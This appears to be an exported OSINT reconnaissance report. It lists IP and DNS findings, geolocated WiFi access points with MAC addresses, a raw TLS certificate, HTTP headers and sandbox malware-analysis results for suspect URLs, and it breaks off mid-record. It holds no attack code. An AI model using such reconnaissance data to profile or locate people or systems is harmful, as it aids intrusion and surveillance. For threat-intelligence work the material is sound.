| 2023-05-12 02:46:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | vscode.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:33:E6:06) | 34.0544, -118.244 |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.68): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:59:06 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.22.0.232', u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://cutt.ly/aXzA6sp', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_bd4_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_bd4_IESQMMUTEX_0_331"\n "IsoScope_bd4_ConnHashTable<3028>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_bd4_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3028"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_bd4_IE_EarlyTabStart_0x860_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bd4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3028"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.0.232:443"\n "34.74.170.74:443"\n "151.101.24.193:443"\n "104.26.4.7:443"\n "23.58.146.135:80"\n "67.202.114.212:443"\n "91.199.212.52:80"\n "151.101.24.158:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"r3.o.lencr.org"\n "crt.usertrust.com"\n "ocsp.sectigo.com"\n "i.imgur.com"\n "video.twimg.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar39D0.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab39CF.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003484]\n "_72F96FE9-1F89-11ED-9450-080027D43B41_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "KPRDW9OF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KPRDW9OF.txt]- [targetUID: 00000000-00003028]\n "device.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003484]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003484]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "Cab39CF.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab39CF.tmp]- [targetUID: 00000000-00003484]\n "7423F88C7F265F0DEFC08EA88C3BDE45_C86B7000B5CEB7F9146D51D7AB048AFE" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_C86B7000B5CEB7F9146D51D7AB048AFE]- [targetUID: 00000000-00003484]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003028]\n "E0968A1E3A40D2582E7FD463BAEB59CD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\E0968A1E3A40D2582E7FD463BAEB59CD]- [targetUID: 00000000-00003484]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003484]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 16x16 32 bits/pixel"- [targetUID: N/A]\n "index_1_.css" has type "ASCII text"- [targetUID: N/A]\n "pingjs_1_.js" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003028]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /aXzA6sp HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: cutt.ly\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.22.0.232]\n\n "0"- [Source: SSL_104.22.0.232]\n\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: cozyfox.netlify.app"- [Source: SSL_34.74.170.74]\n\n "pdL!"hBo%y[/Hd\'Lx?Np2B/5tO$3LEBD9:>;=8EVm\n2j\\VkO9XFG!x9\\5IcsE3`Jto{8i;%04B4Lhr;;Aqo{*Fh#qw{tB@u\\gqIPpEdMRoGS$dg\'#e)Jq_}vimuxpM5wh{g7y<f6~yr*O\n=\nC?P\\>|@{8*l^iFAVt;z7_rk_[:&f.iy/CFns7esgO/_\\<~bIfmp|Ky7lrkk>xp8Q?Th"- [Source: SSL_34.74.170.74]\n, "GET /d6CE5mr.png HTTP/1.1\nAccept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5\nReferer: https://cozyfox.netlify.app/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip\n deflate\nHost: i.imgur.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_151.101.24.193]\n, "HTTP/1.1 200 OK\nConnection: keep-alive\nContent-Length: 12161\nLast-Modified: Thu\n 07 Jul 2022 21:19:55 GMT\nETag: "af7c51313b7c4188cf839b655156702a"\nContent-Type: image/png\ncache-control: public\n max-age=31536000\nAccept-Ranges: bytes\nDate: Fri\n 19 Aug 2022 08:38:09 GMT\nAge: 875904\nX-Served-By: cache-iad-kjyo7100064-IAD\n cache-lax10679-LGB\nX-Cache: HIT\n HIT\nX-Cache-Hits: 1\n 1\nX-Timer: S1660898290.859840\nVS0\nVE1\nStrict-Transport-Security: max-age=300\nAccess-Control-Allow-Methods: GET\n OPTIONS\nAccess-Control-Allow-Origin: *\nServer: cat factory 1.0\nX-Content-Type-Options: nosniff"- [Source: SSL_151.101.24.193]\n, "PNG\n\n\nIHDR\'S"/HIDATx}Ed&$!C E |(O\'CSE}~>}<D?EQ"5YHBVd;vw}%}w~N^?Nb/@2aYT.#B0v,r].?|?j bwO;`29+&0yzUgP]98s,;\'0U0jmh+sw|]K)NuhSh(Xh}MLZ`\\kA;JyVnaLs`2ys&w_?J\nNq0q]Y\\a2P{w\nEM*J`\'a9?Dl}7utPr5R1:gkMw%J*)8\nJT#\'`ly7I528h1(G,XGR`J%CKlw\n{z"PTgF#l+"r|+^v]uDv>`oyxJ4zGx\n&,"oNA)EZghqP^*e-U "ts(|=kZ%=7?u*hmX\'QxFe-]<J#g\'!]2?ura:>ur8qi^~=D^}0yU\'dJ_:Lu1q,?_tjJ*)8\')\\-A+j:\'g\'C$h\nm"/_*vgNt^]}`mj62\n3p;PX6glv\n-\nx7_ZR3*;vQoU~}u4!n<\'7\\sI/QJF)3-F,4rg0\n;Yy`Oz+Gdpo<3Xi|rqgUXl`{ihOz4j7?Pz3A4<+P3X^ kkCCY<\\UiY^^e+*,7{pF=m41VzzH/EU\nN2zs(u#IYS*=xY#JOHSI1S6%`YfhyK<02N}oiqa`Fi-"- [Source: SSL_151.101.24.193]\n, ">>{f~uu8u~SUTo!(x:qPrwL41}[=2MZes\'3k `BTa51SXB]4%4KBI0Q0p\n?I\\=J9"s=!\n*g^dO|YX7)R~$w%\nx?&]NlTD~dg@VL#*RXhyPlR:M{m.A^tP7%/B6kA-QD\'20!&PkCXC2G<vi_fPwU^CIeL\nK)Ap)9YhuncM!C,\'Q(=lw*pZeg8Q]O&YB BNCoJ_lszZw+0@dp9KbQENI-l-BoE/4\'j~;{UPfjbLYE`BsPLGbGc},\n<ki!8U\'i6%S!.2O=&}2C\'J`~FI6d2kz_]EZE@`.X&4?O;Oa7fvh *P?QzM*]~)D(=8qsNn,;~x3x{-/)_b}\nTuVF=LdU\nY].YVqWl,90^Cj/2>sGkA\n_?I\'T797E`fcoI:rU95[=cm4"+NvXLC:|OSq[><]]5M3r# kgbGm_mKoo{ar2z)O_\nC5Decp4f>7P5\'eSnfuwlC>5AGECP/F]5mzz3gt[{av]e5g]V%~;g6!0=uw^R9zQ?5Tu`"2wP?91EqsNM\nz~ubC!"- [Source: SSL_151.101.24.193]\n, "}#oF|E-7ztuIjwykYZ?{ZIea@(&Q|\'+8_KXE!:1qtto7g\\^ft34cH)u)*T6VN\nuB)0rY$\nYCp2M3AL=I3@[_+6!s*<ryqwlX;x%OT4grZo3S7{xK3iQkmo?t~;X\n`J>Qx}qNhw\nQE9HRB\\/g(nXG^Z5TLfB]}~SP8 | 34.74.170.74 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sternmismuschel (Net ID: 00:01:E3:C9:B9:3F) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Juggernaut (Net ID: 00:0C:41:D7:E4:AF) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 02:58:10 | SSL Certificate - Raw Data | No | Certificate Transparency | 7 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
| ayhu.xyz |
| 2023-05-12 02:44:59 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.108.153 |
| 2023-05-12 03:41:52 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | microsoft windows | 45.131.109.53 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3P<]00D^20&51%1C35&6H'%***%Ph (Net ID: 00:06:66:2A:52:5E) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.2): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} |
| 2023-05-12 02:48:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.coolroof.biz/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2932"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IE_EarlyTabStart_0xb9c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_ConnHashTable<2932>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b74_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b74_IESQMMUTEX_0_303"\n "IsoScope_b74_IESQMMUTEX_0_519"\n "IsoScope_b74_ConnHashTable<2932>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.235.199.120:80"\n "23.235.199.120:443"\n "142.250.191.42:443"\n "50.18.123.174:443"\n "142.250.191.40:443"\n "162.159.138.60:443"\n "13.227.74.3:443"\n "52.9.93.55:443"\n "13.227.74.65:443"\n "142.251.46.226:443"\n "13.227.74.101:443"\n "142.250.191.46:443"\n "13.227.21.156:443"\n "13.227.74.12:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.coolroof.biz"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"birdeye.com"\n "player.vimeo.com"\n "rms.footbridgemedia.com"\n "www.coolroof.biz"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2019 Twitter, Inc." (Indicator: "twitter")\n "_.merge(PublicForm.prototype,{formLogic:new WufooFormLogic(),fieldLogic:new WufooFieldLogic(),runningTotal:\'\',ruleLogic:\'\',formHeight:\'\',timerActive:false,genericInputs:{},sortedTabindexes:[],isEntryManager:false,unableToChangeFile:\'We were unable to change your file.\',runInit:function(){var redirectingToPaymentPage=this.continueToPaypal();this.initCalendars();this.formLogic.setLoadTime();this.formLogic.observeFormSubmit();this.fieldLogic.initializeFocus();this.fieldLogic.showRangeCounters();if(!redirectingToPaymentPage){this.formLogic.initAutoResize(0);}" (Indicator: "paypal")\n "if(nextField){nextField.focus();if(event&&event.preventDefault){event.preventDefault();}else{return false;}}}},setFormHeight:function(){this.formHeight=document.body.offsetHeight+this.formLogic.offset;},continueToPaypal:function(){var redirectingToPaymentPage=false;var $merchant=$(\'#merchant\');var $merchantMessageText=$(\'#merchantMessageText\');if($merchant.length){redirectingToPaymentPage=true;if($merchantMessageText.length){$merchantMessageText.show();$(\'#merchantButton\').hide();}" (Indicator: "paypal")\n "{state:0,transportUrl:b,context:c,parent:li()},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+le.ca+"&cx=c";Oo()&&(f+="&sign="+le.Zd);var g=ue||we?No(b,f):void 0;g||(g=xl("https://","http://",le.od+f));fi().destination[a]={state:1,context:c,parent:li()};Hb(g)}};function Po(){if(di()){return!0}return!1};var So=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),To={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Uo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "{state:0,transportUrl:b,context:c,parent:Ll()},P(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Kh.ia+"&cx=c";os()&&(f+="&sign="+Kh.Re);var g=Th||Vh?ns(b,f):void 0;g||(g=Zo("https://","http://",Kh.ue+f));Fl().destination[a]={state:1,context:c,parent:Ll()};mc(g)}};function ps(){if(Dl()){return!0}return!1};var ss=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),ts={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},us={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "var ew=function(a,b,c){function d(){var g=a();f+=e?(Va()-e)*g.playbackRate/1E3:0;e=Va()}var e=0,f=0;return{createEvent:function(g,h,m){var n=a(),p=n.Kg,q=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Kg*h):Math.round(n.Hi),r=void 